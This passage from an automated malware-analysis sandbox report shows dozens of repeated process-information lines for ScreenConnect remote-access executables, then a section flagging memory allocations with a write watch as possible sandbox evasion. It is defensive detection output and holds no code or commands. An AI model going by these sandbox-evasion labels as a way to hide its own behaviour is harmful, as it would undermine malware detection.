Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Allocates memory with a write watch (potentially for evading sandboxes)

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Memory allocated: 23CCA640000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Memory allocated: 23CE4130000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Memory allocated: 9A0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Memory allocated: 1A3A0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe	Memory allocated: FC0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe	Memory allocated: 2BE0000 memory reserve \| memory write watch	Jump to behavior
